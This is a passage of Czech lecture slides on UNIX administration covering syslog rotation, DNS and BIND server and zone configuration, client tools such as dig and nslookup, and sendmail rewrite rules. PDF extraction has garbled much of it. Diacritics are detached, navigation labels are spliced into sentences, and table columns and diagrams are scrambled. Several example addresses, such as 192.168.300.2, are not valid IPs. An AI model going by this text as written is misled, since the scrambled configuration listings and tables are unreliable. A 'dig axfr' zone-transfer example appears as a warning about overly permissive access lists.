ˇ logují se i úrovneˇ nad když je specifikována úroven, ní ˇ nekteré verze nemusí mít kompletní podporu pro syntax a la OpenBSD (napˇríklad IBM UNIXy) zkratka “ˇcárka” není podporována znaˇckované bloky (proces name/PID)

mezi selekcí a akcí je jeden nebo více tabulátoru˚


Cviˇcení

Rotování logu˚


Rotování logu˚ zajišt’uje další démon, napˇríklad newsyslog(8) nebo logrotate.



ˇ Rotování probíhá v nekolika krocích:

Domain Name System Zóny a domény

staré logy se pˇremístí na nové místo


2

ˇ touch-nou se soubory na puvodních ˚ umísteních

Name servery

3

HUPne se syslogd, respektive se pošle správnému programu správný signál

1

Módy dotazu˚ do DNS

Konfigurace serveru BIND implementace

4

zpracují se staré soubory (komprese)


Cviˇcení

ˇ V OpenBSD je k dispozici newsyslog(8) spouštený root-em v rámci jeho crontab-u každou celou hodinu.

Administrace UNIXu

/etc/newsyslog.conf


# logfilename owner:group /var/cron/log root:wheel /var/log/authlog root:wheel /var/log/daemon /var/log/lpd-errs /var/log/maillog /var/log/messages /var/log/secure /var/log/wtmp /var/log/xferlog /var/www/logs/access_log ...> /var/run/httpd.pid SIGUSR1 /var/www/logs/error_log ...> /var/run/httpd.pid SIGUSR1

mode 600 640 640 640 600 644 600 644 640 644

ngen 3 7 5 7 7 5 7 7 7 7

size 10 * 30 10 * 30 * * 250 250

time [ZB] Zpracování zpráv systému Z * 168 Z Domain Name System Z * Zóny a domény Z * Co je potˇreba pro zónu 24 Z Módy dotazu˚ do DNS Name servery Z * Konfigurace serveru 168 Z BIND implementace 168 ZB Klientské utility Pˇrevod IP→hostname Z * Pˇríklady, speciality Z ...> Typické pasti a chyby *

644

7

250

*

Praxe

Z ...>Cviˇcení

Administrace UNIXu

Praxe



jeden syslog box realizující logování pro více stroju˚ syslog box bez možnosti sít’ového pˇripojení (ssh) syslog box s paranoidní bezpeˇcností bez dalších démonu˚ ˇ ˇ zablokování nekterých API volání kernelu (zmeny ˇ smerování. ..)


Cviˇcení

Praxe

Administrace UNIXu Leo Galamboš ˇ Smerování

syslog-ng, rsyslog podpora TCP, SSL kvuli ˚ spolehlivosti ukládání zpráv pˇrímo do DB (SQL, MongoDB) versus problematika BigData


Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru

systemd/journald (Linux)

BIND implementace Klientské utility Pˇrevod IP→hostname

nativní append-only binární soubory, ev. redirekce do syslog-ng, rsyslog syslog muže ˚ být i klientem jako journalctl(1)40 centralismus dává horší výkony i granularitu

40

Pˇrístup ke zprávám pˇred startem syslog


Cviˇcení

Zaˇcátky


V roce 1970 má ARPAnet pár stroju˚ a jejich báze je v jednom souboru spravovaném na Network Information Center ve Stanford Research Institute. Do centrály ˇ a stahují si aktuální verzi posílají lokální správci zmeny báze. S rustem ˚ síteˇ a plným pˇrechodem na TCP/IP byl tento zpusob ˚ práce neudržitelný.



ˇ ren vytvoˇrením distribuovaného Paul Mockapetris byl poveˇ systému → RFC 882 883 (1984) → RFC 1034 1035 (souˇcasné)

Cviˇcení

Zivot bez DNS: /etc/hosts



# # Table of IP addresses and hostnames # 127.0.0.1 localhost 172.16.12.1 logger.firma.cz loghost 172.16.1.2 oracle.firma.com ora


Cviˇcení

Administrace UNIXu

Zóny a domény


cz

Linuxoviny

Zpracování zpráv systému Domain Name System

cuni

Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS

lf

mff

pedf

Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby

www

cs

Praxe

Cviˇcení

Administrace UNIXu

Zóny a domény


cz

Linuxoviny


cuni

Zóny a domény Co je potˇreba pro zónu

lf

mff

pedf

A


195.113.36.2

Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality

www CNAME

cs

A

Typické pasti a chyby

195.113.20.12

Praxe

Cviˇcení

Administrace UNIXu

Zóny a domény


cz

Linuxoviny


cuni


lf

mff

pedf

A


195.113.36.2


www CNAME

cs

A


195.113.20.12

cuni.cz domain

Praxe

Cviˇcení

Administrace UNIXu

Zóny a domény

Leo Galamboš ˇ Smerování

delegování

cz



cuni


lf

mff

pedf

A


195.113.36.2


www CNAME

cs

A


195.113.20.12

Praxe

Cviˇcení

Administrace UNIXu

Zóny a domény

Leo Galamboš ˇ Smerování

delegování

cz

zone

cuni



lf

mff

pedf

A


195.113.36.2


www CNAME

cs

A


195.113.20.12

Praxe

Cviˇcení

Doménová jména


zapisují se od nejvíce po nejméneˇ významnou cˇ ást (od hostname k top-level) FQDN (fully qualified domain name) konˇcí doménou ˇ napˇríklad www.hq.firma.com. nejvyšší úrovne,


ˇ relativní jméno - systém k nemu pˇripojí defaultní doménové jméno, napˇríklad www.hq ˇ na vetšin eˇ systému˚ se ke jménu s teˇckou již nepˇripojuje defaultní doménové jméno

BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe

Cviˇcení

Administrace UNIXu

Zóny



pro zónu musí existovat alesponˇ jeden autoritativní DNS

Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS

ˇ vetšinou se požadují alesponˇ dva

Name servery Konfigurace serveru

AADNS: plneˇ postaˇcuje, když podporuje nerekursivní mód


Cviˇcení

Dotazy do DNS



nerekursivní (iterativní) mód vrací jen známou informaci nebo hint

Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru

rekursivní mód následuje hinty a celý dotaz se doˇreší


Cviˇcení

Name servery


primár (master) cˇ te data o zóneˇ z konfiguraˇcního souboru sekundár (slave) cˇ te data pˇri svém startu z primáru a pak v urˇcitých intervalech ˇ keš dotazuje se AADNS serveru a odpovedi kešuje proxy (forwarder) všechny neresolvované dotazy ˇ posílá na jiný DNS server a kešuje odpovedi


Cviˇcení

Primár i sekundár jsou rovnocennými AADNS, liší se jen zdrojem svých informací. . . viz následující schéma. . .

Administrace UNIXu

Name servery


Vzdálený admin

Master AXFR IXFR Slave

Resolver Remote caching

TSIG

DNSSEC



Proxy

Name servery

BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby

Speed

Lokální disk


Konfigurace serveru

High Disk

Domain Name System

Praxe

Dumb

Cviˇcení

Konfigurace DNS (systém)

Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování

1

2

režim práce DNS — /var/named/etc/named.conf soubory se zónami (AADNS)41 /var/named/master/* /var/named/slave/* /var/named/standard/*: root hint, loopback, localhost

3

41

ˇ v chroot-u a syslogd(8) mu dává BIND cˇ asto beží do ohrádky rouru dev/log — OpenBSD: nastavte named_flags a restartujte nebo jen restartujte syslogd se správnými parametry

OpenBSD rozložení

Linuxoviny


Cviˇcení

Konfigurace BIND8/9 – primár (master)


zone "example.com" IN { type master; file "master/example.com"; };

Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname

ˇ mají AA bit odpovedi existuje “primary master” – NS v SOA (význam pro dynamické updaty) nemá souvislost s primary/secondary v MS-Windows


Cviˇcení

Konfigurace BIND8/9 – sekundár (slave)


zone "example.com" IN { type slave; file "slave/example.com"; masters { 192.168.300.2; }; };


stahuje z “masters” aktuální stav zóny (expiry v SOA)


nikdy nepoužívá zastaralá data “file” je nepovinný atribut, de-facto zrychluje restarty BINDu

Cviˇcení

Konfigurace BIND8/9 – keš


options { directory "/var/named"; version "ouha"; recursion yes; }; // cokoliv zone "." IN { type hint; file "root.servers"; };



RR z primáru/sekundáru zóny vrací s AA bitem, z keše ne ˇ to keš musí mít povolenou rekursi (je defaultne), implikuje “hint” sekci ˇ neukládá se na disk keš je pouze v pameti, ˇ keš zatežuje samotný server, nehodí se na 1000q/sec


Cviˇcení

Konfigurace BIND8/9 – proxy


Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace

fallback

Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby

forwarder

Praxe

Cviˇcení



options { // globálnˇ e directory "/var/named"; version "ouha"; forwarders {192.168.300.1; 192.168.300.2;}; forward only; };

Linuxoviny


zone "example.com" IN { // per domain type forward; forwarders {192.168.300.1; 192.168.300.2;}; };


Cviˇcení

ˇ podporovat rekurzivitu cíl by mel



options { forwarders {12.266.48.32; }; forward only; };

Linuxoviny


Server nadále spoléhá na vlastní autoritativní záznamy, ale pak již výhradneˇ na forwarder (direktiva forward-only).


Cviˇcení

Otázka K cˇ emu mít forwarder tohoto typu? Proˇc to nenapsat pˇrímo do resolv.conf(5)?

Ryze autoritativní DNS server


Definice ˇ mají výhradneˇ AA (server je tedy odpovedi master/slave) nekešuje


Zpracování zpráv systému Domain Name System Zóny a domény

options { directory "/var/named"; version "ouha"; recursion no; allow-transfer {"none";}; // v zónˇ e pak allow-transfer pro sekundáry };

Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe

Cviˇcení

Využití zvýšení výkonu ˇ veˇrejný DNS server v rozdeleném DNS systému (soukromé/DMZ/veˇrejné)

Konfigurace BIND8/9 – komplex


options { directory "/var/named"; listen-on-v6 { none; }; listen-on { 127.0.0.1; }; }; zone "." IN { type hint; file "standard/root.hint"; };


Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery

zone "cuni.cz" IN { type master; file "master/cuni.cz"; allow-transfer { 195.113.0.2; } allow-update { none; }; notify no; }; zone "egothor.org" IN { type slave; file "slave/egothor.org"; masters { 134.36.80.123; } allow-update { none; }; };

Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe

Cviˇcení

Konfigurace DNS (zóny)


$TTL 172800 ; 2 dny @ IN SOA

localhost. ns mail

IN IN IN IN IN


ns.localhost. root.localhost. ( 2002081601 ; Serial YYYYMMDDVV 28800 ; Refresh 14400 ; Update retry 604800 ; Expire - 1 week 86400 ) ; Minimum NS ns MX 10 mail.localhost. A 127.0.0.1 A 127.0.0.1 A 127.0.0.1


Cviˇcení

DNS záznamy (RR)


SOA start-of-authority signalizuje autoritu nad danou zónou


NS name-server v dané zóneˇ MX mail-exchanger v dané zóneˇ

Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace

A name-to-address mapování PTR address-to-name mapování CNAME canonical name (alias)


Cviˇcení

SOA - cˇ asovaˇce ˇ Refresh sekundáry v tomto intervalu sledují zmeny na primáru Retry za jak dlouho zkouší sekundár kontaktovat primár, který neodpovídá ˇ záznamu˚ Expire doba vedoucí k nezplatnení (nadále nejsou autoritativní) ˇ nekolik ˇ MinTTL melo rozdílných významu˚ 1 minimální TTL všech RR (odmítnuto praxí) 2 default TTL pro RR bez TTL (vhodné jen pro primáry) 3 ˇ (“pozitivní”: TTL negativních odpovedí direktiva TTL)

Doporuˇcené nastavení koˇrenové servery 8h-2h-30d-4d ˇ bežné servery 8h-2h-7d-1d



Cviˇcení



$TTL 2d $ORIGIN lg.com. @ IN SOA ns1.lg.com. hostmaster.lg.com. ( 2006010100 ; Serial 3h ; Refresh 15M ; Retry 3W12h ; Expiry 2h20M ; Minimum ) IN NS ns1 ; lg.com. IN NS ns1.lg.com. IN NS ns2 ; klasické Aˇ cko ns1 IN A 192.168.300.3 ns2 IN A 192.168.300.4


Cviˇcení



$TTL 2d $ORIGIN lg.com. @ IN SOA ns1.cp.com. hostmaster.lg.com. ( 2006010100 ; Serial 3h ; Refresh 15M ; Retry 3W12h ; Expiry 2h20M ; Minimum ) IN NS ns1.cp.com. IN NS ns2.nˇ ekde.cz. ; tohle není naše vˇ ec!! ;ns1.cp.com. IN A 192.168.300.3 ;ns2.nˇ ekde.cz. IN A 192.168.300.4


Cviˇcení



$TTL 2d $ORIGIN lg.com. @ IN SOA ns1.lg.com. hostmaster.lg.com. ( 2006010100 ; Serial 3h ; Refresh 15M ; Retry 3W12h ; Expiry 2h20M ; Minimum ) IN NS ns1 IN NS ns2 ns1 IN A 192.168.300.3 ns2 IN A 192.168.300.4 www IN A 192.168.300.5



Cviˇcení

out ns3.out

IN IN IN

NS NS A

ns3.out.lg.com. ns2.lg.com. 192.168.300.6 ; GLUE!

Administrace UNIXu

Verze

Leo Galamboš

ˇ verze BIND (Berkeley Internet Name Nejpoužívanejší Domain): 4.X starší verze: obtíže s multihomed 8.X/9.X multihomed, rozumná ACL pro pˇrístup ke službám DNS



DNS u jednotlivých záznamu˚ uvádí cˇ as — 4.X pouze v sekundách. BIND9 už rozumí zkratkám za cˇ ísly: #s sekundy

Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby

#m minuty #h hodiny #d dny #w týdny

Praxe

Cviˇcení

Signály


HUP znovunaˇctení báze záznamu˚ INT uložení interní DB BINDu do named_dump.db


WINCH zapne/vypne logování všech dotazu˚ pˇres syslog ABRT/ILL vypsání statistik do named.stats (ABRT – v4, ILL – v8) USR1/USR2 zapnutí a vypnutí debug režimu TERM uloží dynamické zóny do souboru˚ (v8)

Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe

Cviˇcení

Konfigurace BIND


poˇcet transferu˚ zón (dovnitˇr i ven)


velikost datových bloku˚

Domain Name System

velikost zásobníku

Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS

poˇcet otevˇrených souboru˚ interval cˇ ištení keše ˇ interval kontroly adaptéru˚ (dynamické zmeny up/down, dhcp. . . ) interval tisku statistiky


Cviˇcení

Alternativy



djbdns: bez DNSSEC, TSIG a IPv6

Domain Name System

dnsmasq: pro SOHO routery

Zóny a domény

MS DNS: postrádá pˇrístupová ACL a split horizon




PowerDNS: nepohodlná podpora DNSSEC, TSIG a split horizon Unbound: postrádá split horizon


Cviˇcení

nslookup



Starší zpusob ˚ pokládání dotazu˚ do DNS serveru.

Domain Name System

nslookup -type=NS cuni.cz alfik.ms.mff.cuni.cz

Zóny a domény

nslookup -type=A www.cuni.cz

Konfigurace serveru

Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery

BIND implementace Klientské utility

nslookup -norecursive -type=NS egothor.org alfik.ms.mff.cuni.cz


Cviˇcení

Administrace UNIXu

dig



ˇ diagnostika než nslookup(1). Kvalitnejší

Domain Name System Zóny a domény

dig @192.168.4.98 . NS

Co je potˇreba pro zónu Módy dotazu˚ do DNS

dig @198.41.0.4 . NS

Name servery Konfigurace serveru BIND implementace

dig @alfik.ms.mff.cuni.cz ms.mff.cuni.cz axfr


Cviˇcení

Pˇrevod IP→hostname


1

A.B.C.D se pˇrevede na D.C.B.A.in-addr.arpa

2

v DNS se hledá PTR záznam pro D.C.B.A.in-addr.arpa

Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery

Jak se deleguje? Kdyby všechny síteˇ byly A.B.C.D/N s N = 8, 16, 24, tak je možné delegovat “na místeˇ teˇcky”. U adres typu A.B.C.D/27 si musíme pomáhat fintou.


Cviˇcení

Delegování podsíteˇ v in-addr.arpa


$ORIGIN 0.127.in-addr.arpa. 33 CNAME 33.32/27 34 CNAME 34.32/27 : 62 CNAME 62.32/27



32/27 NS

ns.somewhere.out.


Konzervativní syntax Lomítko není korektní znak v hostname, proto se ˇ nahrazuje nejakým povoleným znakem (typicky pomlˇckou).

Cviˇcení

Efektivní transfery zóny


options { // default transfer-format many-answers; };



server 12.266.48.32 { // MS-Windows transfer-format one-answer; }


Cviˇcení

many-answers umí jen BIND9/8, pozdní cˇ tyˇrka one-answer je tˇreba pro komunikaci se staršími BINDy (nebo i MS-Windows)

Dynamický update



zone "egothor.org" { type master; file "pri/egothor.org"; allow-update { 127.0.0.1; }; };


Podrobnosti nsupdate(8)

Cviˇcení

NOTIFY k sekundárum ˚



zone "egothor.org" { type master; file "pri/egothor.org"; notify yes; also-notify 129.34.20.80; };


Cviˇcení

Pˇríliš volné ACL


Pˇríklad: transfery zón z IP adres, které nejsou našimi sekundáry. Filosoficky je to správneˇ (DNS záznamy jsou ˇ public), prakticky to muže ˚ prozradit strukturu síte. # dig @195.113.20.71 -t axfr ms.mff.cuni.cz ; <<>> DiG 9.2.5 <<>> @195.113.20.71 -t axfr ms.mff.cuni.cz ; (1 server found) ;; global options: printcmd ms.mff.cuni.cz. 28800 IN SOA ns.ms.mff.cuni.cz. hostmaster.ms.mff.cuni.cz. 2005101802 28800 14400 2419200 86400 ms.mff.cuni.cz. 28800 IN NS ns.ms.mff.cuni.cz. ms.mff.cuni.cz. 28800 IN NS sns.ms.mff.cuni.cz. ms.mff.cuni.cz. 28800 IN NS ns.kolej.mff.cuni.cz. ms.mff.cuni.cz. 28800 IN NS golias.ruk.cuni.cz. ms.mff.cuni.cz. 28800 IN MX 20 smtp1.ms.mff.cuni.cz. ms.mff.cuni.cz. 28800 IN MX 20 smtp2.ms.mff.cuni.cz. ms.mff.cuni.cz. 28800 IN MX 40 smtp1.kolej.mff.cuni.cz. : :



Cviˇcení

Kešování


Kešují se nejen záznamy týkající se vlastního požadavku, ale i odkazy na autoritativní NS.


ˇ ˇ (od vetšina NS kešuje pozitivní odpovedi autoritativních zdroju) ˚ ˇ ⇒ opatrneˇ BIND 4.9/8/9 kešuje i negativní odpovedi s TTL záznamu˚

Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby

ˇ — bývalo natvrdo 10 minut. TTL negativních odpovedí

Praxe

Cviˇcení

Glue


Pozor Nevkládejte do zón chybné nebo duplicitní glue záznamy!


glue je potˇreba pouze když je NS v téže doméneˇ a ješteˇ není odpovídající A-záznam ˇ nekteré kompilace BIND hlásí chybné glue, ale poslední standard-branch nikoliv ⇒ dávejte pozor sami


Cviˇcení

Administrace UNIXu

dot-bouda


Položka neukonˇcená teˇckou dostává suffix $ORIGIN: mail mail2

MX 10 MX 10

relay.isp.out. relay2.isp.out

Linuxoviny


znamená totéž co ($ORIGIN = mydomain.in)

BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality

mail mail2

MX 10 MX 10

relay.isp.out. relay2.isp.out.mydomain.in.

Typické pasti a chyby Praxe

Cviˇcení

Zamet’te si vlastní smetí ˇ pˇricházet zbyteˇcné Na koˇrenové servery by nemely ˇ sloužit jako žádosti, proto by každý nameserver mel primár pro: 0.in-addr.arpa 255.in-addr.arpa 0.0.127.in-addr.arpa ˇ být Staˇcí pokrýt SOA a NS, u localhost revers by mel ješteˇ záznam:



1

PTR

localhost.


Není dobré pˇripustit k localhost ješteˇ lokální doménu, protože: localhost je všude v “poˇrádku” ˇ pˇreklad 127.0.0.1 na localhost.mydomain a zpet vede cˇ asto pˇres DNS, prostý localhost. se zpracuje pˇres lokální tabulky /etc/hosts

Cviˇcení

Kontrola



1

SOA a cˇ asovaˇce

2

Glue je v poˇrádku

3

MX záznamy

Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery

4

sekundáry pracují


Cviˇcení

Administrace UNIXu

Problém: chybný SOA serial


souˇcasný SOA serial je menší než správný — staˇcí nastavit na primáru správný a inicializovat reload (SIGHUP)


ˇ než správný souˇcasný SOA serial je jen o málo vetší — necháme to být ˇ než správný — souˇcasný SOA serial je o hodneˇ vetší pˇretoˇcíme SOA serial pˇres 31. bit 1 2

3

31

2014023101 → 2014023101 + 2 − 1 = 4161506748 reload primáru, sekundáry si musí stáhnout nové zóny 4161506748 → 2004022101


Cviˇcení

Nameservery


alesponˇ 2 - ochrana proti výpadku


alesponˇ jeden v každé (pod)síti - eliminace problému˚ ˇ se smerovaˇ cem

Domain Name System Zóny a domény Co je potˇreba pro zónu

ˇ poblíž vetších stroju, ˚ ne nutneˇ na nich - generují ˇ nejvetší poˇcet DNS dotazu˚


homogenní O/S prostˇredí DNS - zjednodušuje správu i analýzu chyb

Klientské utility

Name servery Konfigurace serveru BIND implementace Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe

ˇ bezpeˇcnost: DNS server (a zejména primár) by mel být na dedikovaném stroji

Cviˇcení

Plánování kapacity


Jak poznám, že je muj ˚ DNS server pˇretížený? ˇ procesu named velikost pameti nebezpeˇcí swapování velké NS pomalu startují ˇ (napˇr. pˇri transferech zón) velké NS se pomalu delí

ˇ CPU - mela ˇ by být velmi malá (ˇrádoveˇ jednotky zátež procent) analýza: pohled do statistik BINDu42 v4: ABRT signal v9: rndc stats

parametry v named.conf, blok options statistics-interval: globální pˇrehled o poˇctech dotazu, ˚ rekurzí, chyb. . . ˇ host-statistics: hledání puvodc ˚ u˚ záteže

42

bindgraph – postavený na RRDtool



Cviˇcení

Vyzkoušejte si



ˇ správné smerování ˇ zajistete mezi svými stanicemi

Domain Name System

spust’te BIND — pozor na OpenBSD a jeho syslogd

Zóny a domény

zaregistrujte si svoji doménu 1. ˇrádu (u cviˇcícího)




nastavte si primár s alesponˇ jedním A-záznamem ˇ rte si navzájem že tento záznam mohou oveˇ resolvovat i ostatní


Cviˇcení

Vyzkoušejte si


rozjed’te sekundár pro cizí zónu na vašem NS delegujte cˇ ást své domény ˇ v zónách a jejich replikace na vyzkoušejte si zmeny sekundáry

Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace

vyzkoušejte si ˇrešení chybného SOA serial pˇretoˇcením pˇres 31. bit ˇ ete ˇ vlastní správu koˇrenové zóny (*) rozbehn


Cviˇcení

Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix

ˇ Cást IV Základy poštovního subsystému

Boj proti SPAMu

Cviˇcení

Program

Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu

22

E-mail Volba MTA Sendmail Postfix Boj proti SPAMu

23

Cviˇcení

Cviˇcení

E-mailový subsystém

Administrace UNIXu Leo Galamboš E-mail Volba MTA

Komponenty MUA Mail User Agent – rozhraní mezi uživatelem a subsystémem Mozilla, Lotus Notes, Pegasus, Eudora ˇ MTA Mail Transport Agent – smeruje/doruˇ cuje poštu mezi uzly SMTP; Sendmail, QMail, Postfix MDA Mail Delivery Agent – doruˇcuje na správné místo v rámci lokálního stroje mh – e-maily v extra souborech, mbox – vše v jednom souboru

Sendmail Postfix Boj proti SPAMu

Cviˇcení

Administrace UNIXu

Schéma modulu˚

Leo Galamboš E-mail Volba MTA Sendmail

MUA

Postfix Boj proti SPAMu

MDA

Síť

MTA

MTA

MTA

Cviˇcení

Administrace UNIXu

MTA

Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu

Cviˇcení

Sendmail: je všude 2× pomalejší než postfix ˇ ejší ˇ (urˇcité pozitivum muže zdaleka nejderav ˚ být sendmail X)

Postfix: z dílny IBM a další: QMail, Exim, Lotus Notes, Exchange. . .

MDA, formát úložišteˇ


mbox


nové e-maily se pˇripojují na konec souboru/schránky uživatele problém se zamykaním, zejména na sít’ových svazcích rychlé vyhodnocování regulárních dotazu˚ nad veškerou došlou poštou

mh/maildir nové e-maily alokují vždy nový soubor v adresáˇri/schránce uživatele podporuje složky v rámci schránky podporuje sdílení složek mezi více uživateli

Cviˇcení

Maildir formát


adresáˇre cur, new, tmp nový e-mail: vytvoˇrení unikátního souboru v tmp, pˇresun do new po pˇríjmu zprávy pˇresun z new do cur

Odpovídající strukturu vytváˇrí napˇr. makemaildir(1) (dovecot).

Boj proti SPAMu

Cviˇcení

Administrace UNIXu

Sucks-Rules-O-Meter

Leo Galamboš

Produkt qmail exim sendmail postfix

Sucks + Sux 165 107 278 265

Rocks + Rox 758 495 1532 1620

Index 4.594 4.626 5.511 6.113

ˇ ˇ rení” kvality “nevedecké meˇ Windows × Unix (http://srom.zgp.org/) 47, 6 310, 8 × 312 193 ˇ je Unix vítez


Cviˇcení

Administrace UNIXu

Sendmail (Eric Allman)

Leo Galamboš E-mail Volba MTA

1979 deliverman BSD 4.0


1983 sendmail BSD 4.1c

Cviˇcení

1998 Sendmail Inc. Konfigurace obsahuje pˇrepisovací pravidla pro parsování e-mailu˚ a volbu správných MTA cˇ i MDA pro další doruˇcování. Konfigurace se píše v makro jazyce, po kompilaci m4(P) vzniká použitelný a pro laiky zcela nepˇrehledný konfiguraˇcní soubor sendmail.cf: SCanonify2=96 R$* < @ localhost > $* R$* < @ localhost . $m > $* R$* < @ localhost . UUCP > $*

$: $1 < @ $j . > $2 $: $1 < @ $j . > $2 $: $1 < @ $j . > $2

M4 macro processor


ˇ proudove-orientovaný (nedetekuje ˇrádky, pouze cˇ te proud dat) ignorování za konec ˇrádky: dnl definice makra: define(‘WWW’,‘www.nic.cz’)

Opatrneˇ s nevinnými konstrukcemi define(‘SMART_HOST’, ‘central-relay.firma.cz’) FEATURE(‘use_cw_file’) dnl Tohle je opravdu poznamka # ale odkaz na FEATURE(‘use_cw_file’) bude expandován i tady


Cviˇcení

Pˇrepisovací pravidla


konfiguraˇcní soubor definuje skupiny pˇrepisovacích pravidel, tzv. rulesets pravidla: zpracují adresy z hlaviˇcky normalizují je urˇcí jak dopis zpracovat (smtp, relay, local)

pravidla odpovídají gramatice, která pracuje nad tokeny (nikoliv samostatnými znaky!)

Cviˇcení

Užiteˇcná makra/konstanty


Cviˇcení

$j FQDN serveru $m domainname serveru $w hostname serveru

Levá strana pravidel (LSP)


Cviˇcení

$@ "prázdno" $* žádný nebo více tokenu˚ $+ alesponˇ jeden token $- práveˇ jeden token

Pˇríklad


$* < $+ >


Cviˇcení

Shoda s Josef Novak < [email protected] > < [email protected] >

Není shoda s Josef Novak <> Josef Novak <>

Pravá strana pravidel (RSP)


$n n-tý výraz v LSP

E-mail Volba MTA

$>n zbytek ˇrádku bude parsován a pˇredán skupineˇ pravidel n k vyhodnocení; výstup z "podprogramu"je pak výstupem tohoto pravidla $#M $@H $:U cíl, napˇr. smtp/mail.firma.cz/josef ˇ dokud Pˇrepisovací pravidlo je aplikováno opakovane, ˇ nastává pˇríslušná shoda. Zmena tohoto standardního pˇrístupu je skrze: $@ skupina pravidel je ukonˇcena a výsledek je zustatek ˚ na RSP $: neukonˇcuje zpracování ve skupineˇ pravidel, ale jen v daném pravidle


Cviˇcení

Skupiny pravidel


0 urˇcí trojici mailer, host, user

Boj proti SPAMu

Cviˇcení

1 aplikováno na adresy odesílatelu˚ 2 aplikováno na adresy pˇríjemcu˚ 3 preprocess všech adres 43 4 postprocess všech adres 44 5 pˇrepisuje nealiasované lokální uživatele

43

pˇrevod na obecný vnitˇrní formát, napˇr. user < @ host . domain . > 44 revertuje vnitˇrní formát, napˇr. [email protected]

Administrace UNIXu

Forma zápisu

Leo Galamboš E-mail Volba MTA Sendmail

Sm Rlsp rsp R..... R.....


volitelná poznámka

Sn R..... R.....

Syntaxe ˇ Položky na R-ˇrádcích oddeluje tabulátor!

Cviˇcení

Pˇríklad modifikace pravidel


Cviˇcení

define(‘SMART_HOST’, ‘.........’) # pred smart-host resolving v ruleset0 LOCAL_NET_CONFIG # lokalni postu posilej primo, ostatni (mozna) via smart host R$* < @ $* .$m. > $* $#smtp $@ $2.$m. $: $1 < @ $2.$m. > $3

Administrace UNIXu

Klasický tok pˇres skupiny pravidel

Leo Galamboš

pˇríjemci jsou analyzováni skupinou 3 − 0 (vznikne doruˇcovací trojice) adresy pˇríjemcu˚ zpracuje skupina 3 − 2 − R = adresy odesílatelu˚ zpracuje skupina 3 − 1 − S = n − 446

Msmtp, P=[IPC], F=mDFMuX, S=EnvFromSMTP/HdrFromSMTP, R=EnvToSMTP, E=\r\n, L=990, T=DNS/RFC822/SMTP, A=TCP $h

45 46

R = n diktuje doruˇcovací agent, 0=nedef S = n diktuje doruˇcovací agent, 0=nedef

n − 445


Cviˇcení

Administrace UNIXu

Testování pravidel


root@fw:2772:~# /usr/libexec/sendmail/sendmail -Ctest.cf ADDRESS TEST MODE (ruleset 3 NOT automatically invoked) Enter
> 3,0 [email protected] canonify input: galambos @ egothor . org Canonify2 input: galambos < @ egothor . org > Canonify2 returns: galambos < @ egothor . org . > canonify returns: galambos < @ egothor . org . > parse input: galambos < @ egothor . org . > Parse0 input: galambos < @ egothor . org . > Parse0 returns: galambos < @ egothor . org . > ParseLocal input: galambos < @ egothor . org . > ParseLocal returns: galambos < @ egothor . org . > Parse1 input: galambos < @ egothor . org . > Mailertable input: < egothor . org > galambos < @ Mailertable input: egothor . < org > galambos < @ Mailertable returns: galambos < @ egothor . org . > Mailertable returns: galambos < @ egothor . org . > MailerToTriple input: < > galambos < @ egothor . org MailerToTriple returns: galambos < @ egothor . org . > Parse1 returns: $# esmtp $@ egothor . org . $: parse returns: $# esmtp $@ egothor . org . $:

-bt


Cviˇcení

egothor . org . > egothor . org . >

. > galambos < @ egothor . org . > galambos < @ egothor . org . >

Zkuste i sendmail -Ctest.cf -d21.12 -bt

ˇ sendmail parametru˚ Zjištení


root@fw:2776:~# /usr/libexec/sendmail/sendmail -d0
Cviˇcení

Administrace UNIXu

Blokování pošty

Leo Galamboš E-mail

Tento pˇríklad vyžaduje podporu MAP_REGEX v sendmail-u!

Volba MTA Sendmail Postfix Boj proti SPAMu

Cviˇcení

